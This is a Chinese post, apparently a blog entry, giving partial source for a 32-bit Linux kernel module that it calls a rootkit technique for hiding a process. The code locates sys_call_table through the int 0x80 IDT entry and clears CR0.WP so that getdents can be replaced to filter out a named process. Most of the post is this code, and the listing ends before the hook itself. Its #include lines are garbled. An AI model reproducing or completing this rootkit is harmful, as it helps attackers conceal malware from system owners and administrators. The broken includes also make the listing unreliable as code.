隐藏进程的原理可以参考其他相关文章，核心思路是：从 IDT 中取出 int 0x80 的入口地址，在入口代码中搜索 `call *sys_call_table(,%eax,4)` 指令以得到 sys_call_table 的地址，再替换 getdents 系统调用来过滤目录项。注意：这是典型的内核级 rootkit 手法，只适用于 32 位 2.6 内核；直接改写 CR0.WP 而不关抢占/中断在 SMP 或可抢占内核上有风险（见代码注释）。
测试环境：Ubuntu 9.04，内核版本 2.6.28（代码按 32 位 i386 内核编写，CR0/IDTR 均按 32 位处理）。
模块代码如下:
/* hideps.c */
#include linux/module。
h>
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
//#include
/* Number of bytes of the int 0x80 entry code that findoffset() scans for the
 * ff 14 85 byte sequence (`call *disp32(,%eax,4)`), whose displacement is the
 * address of sys_call_table. */
#define CALLOFF 100
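/*
 * Module state.
 *
 * orig_cr0 receives the CR0 value returned by clear_and_return_cr0() so the
 * write-protect bit can be restored by setback_cr0().  It is declared
 * unsigned to match that function's return type; the original `int` silently
 * sign-converted the register image.
 *
 * processname is the name of the process to hide.  It defaults to "looptest"
 * (8 chars + NUL fits in the 10-byte psname buffer).  The module_param() that
 * would make it settable at insmod time is left disabled, exactly as in the
 * original listing.
 */
unsigned int orig_cr0;
char psname[10] = "looptest";
char *processname = psname;
/* module_param(processname, charp, 0); */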
/*
 * In-memory image of the IDTR register: a 16-bit limit followed by a 32-bit
 * linear base address.  Packed so it occupies exactly the 6 bytes that the
 * 32-bit `sidt` instruction stores — presumably the module fills it with
 * sidt elsewhere (that code is not in this listing).  A 64-bit kernel would
 * need a 64-bit base field.
 */
struct idtr_image {
	unsigned short limit;	/* IDT limit as stored by sidt */
	unsigned int base;	/* linear address of the IDT */
} __attribute__((packed)) idtr;
/*
 * One 32-bit IDT gate descriptor (8 bytes).  The handler offset is split
 * into a low half (off1) and a high half (off2) around the code segment
 * selector and the type/attribute byte.  `idt` is meant to point at the
 * gate array whose base comes from idtr; presumably entry 0x80 is read to
 * reach the system-call entry stub (not shown in this listing).
 */
struct gate_desc32 {
	unsigned short off1;	/* handler offset bits 0..15 */
	unsigned short sel;	/* code segment selector */
	unsigned char none;	/* reserved */
	unsigned char flags;	/* gate type, DPL, present bit */
	unsigned short off2;	/* handler offset bits 16..31 */
} __attribute__((packed)) *idt;
/*
 * Record layout returned by the legacy getdents(2) system call (not the
 * linux_dirent64 variant).  d_reclen is the length of the whole record and
 * d_name is a NUL-terminated name that in practice runs past the nominal
 * 1-byte array, so a buffer of these is walked with d_reclen, never sizeof.
 */
struct linux_dirent {
	unsigned long d_ino;		/* inode number */
	unsigned long d_off;		/* offset to the next record */
	unsigned short d_reclen;	/* total length of this record */
	char d_name[1];			/* filename, NUL-terminated, variable length */
};
/* Address of the kernel's system-call dispatch table, located at runtime by
 * scanning the int 0x80 entry code (the symbol is not exported to modules).
 * Each element is a pointer to a handler; stays NULL until the lookup runs. */
void **sys_call_table;
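/*
 * Clear CR0.WP so the kernel can write to pages mapped read-only — this is
 * what lets the module later overwrite an entry of sys_call_table.
 * Returns the CR0 value as it was before the change, for setback_cr0().
 *
 * Notes for reviewers:
 *  - The mask 0xfffeffff clears bit 16, which is WP (write protect).  The
 *    original comment called it "the 20th bit"; the code was always right,
 *    only the comment was wrong.
 *  - A "memory" clobber is added to the CR0 write: without it the compiler
 *    may hoist the store to the protected page above this asm (the function
 *    is small enough to be inlined), which faults with WP still set.
 *  - CR0 is per-CPU and nothing here disables preemption or interrupts.  If
 *    the task migrates before setback_cr0() runs, WP is cleared on one CPU
 *    and "restored" on another.  The caller should bracket the pair with
 *    preempt_disable()/preempt_enable() or local_irq_save() — TODO confirm,
 *    the caller is not in this listing.
 *  - `movl` with a 32-bit operand only assembles for an i386 kernel (the
 *    2.6.28 target of this post); x86-64 needs 64-bit CR0 accesses.
 */
unsigned int clear_and_return_cr0(void)
{
	unsigned int saved;

	asm volatile ("movl %%cr0, %%eax"
	              : "=a"(saved));
	/* ~(1u << 16): keep every bit except WP. */
	asm volatile ("movl %%eax, %%cr0"
	              :
	              : "a"(saved & ~(1u << 16))
	              : "memory");
	return saved;
}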
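/*
 * Write `val` back into CR0 — intended for the value returned by
 * clear_and_return_cr0(), so the write-protect bit is re-enabled once the
 * table patch is done.
 *
 * The "memory" clobber is the fix: it forces any pending store (the
 * sys_call_table entry write) to be emitted before WP is switched back on,
 * rather than letting the compiler sink it past this asm and fault.
 * Must run on the same CPU as the matching clear_and_return_cr0() call;
 * CR0 is per-CPU and nothing in this listing pins the task.  32-bit only,
 * like its counterpart.
 */
void setback_cr0(unsigned int val)
{
	asm volatile ("movl %%eax, %%cr0"
	              :
	              : "a"(val)
	              : "memory");
}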
/* Saved pointer to the kernel's original sys_getdents handler — presumably so
 * the replacement can call through to it and the module can restore it on
 * unload (the hook itself is not in this listing).  asmlinkage must be kept:
 * on i386 system-call handlers take their arguments on the stack, so the
 * calling convention has to match.  __user is the sparse annotation marking
 * dirp as a user-space pointer. */
asmlinkage long (*orig_getdents)(unsigned int fd,
struct linux_dirent __user *dirp, unsigned int count);
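/*
 * Scan at most CALLOFF bytes of code starting at `start` for the byte
 * sequence ff 14 85, which on i386 encodes `call *disp32(,%eax,4)` —
 * presumably the indirect call the int 0x80 entry stub makes through
 * sys_call_table.  Returns a pointer to the ff opcode byte (the 4-byte
 * table address is the displacement at offset 3), or NULL if not found.
 *
 * The loop stops three bytes short of start + CALLOFF so the 3-byte compare
 * never reads past the CALLOFF window; the original bound allowed the last
 * two iterations to peek up to 2 bytes beyond it.  Bytes are compared as
 * unsigned char so the match does not depend on char signedness.
 */
char *findoffset(char *start)
{
	const unsigned char *cur = (const unsigned char *)start;
	const unsigned char *end = cur + CALLOFF - 2;	/* one past last valid match */

	for (; cur < end; cur++) {
		if (cur[0] == 0xff && cur[1] == 0x14 && cur[2] == 0x85)
			return (char *)cur;
	}
	return NULL;
}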